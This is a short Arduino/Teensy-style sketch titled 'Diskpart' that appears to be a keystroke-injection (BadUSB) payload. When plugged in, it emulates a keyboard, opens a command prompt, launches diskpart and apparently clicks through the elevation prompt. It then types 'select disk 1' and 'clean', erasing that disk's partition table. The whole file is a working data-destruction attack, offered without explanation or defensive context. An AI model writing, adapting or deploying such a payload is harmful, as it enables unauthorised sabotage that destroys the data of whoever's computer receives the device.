#Diskpart

void setup()
{
Serial.begin(9600);
delay(9600);
Keyboard.set_modifier(MODIFIERKEY_LEFT_GUI);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
delay(9000);
Keyboard.print("cmd");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print("diskpart");
Keyboard.press(KEY_RETURN);
delay(2000);
Keyboard.press(KEY_LEFT);
Keyboard.release(KEY_LEFT);
delay(1000);
Keyboard.press(KEY_SPACE);
Keyboard.release(KEY_SPACE);
delay(1000);
Keyboard.print("list disk");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print("select disk 1");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print("clean");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
}
void loop()
{
}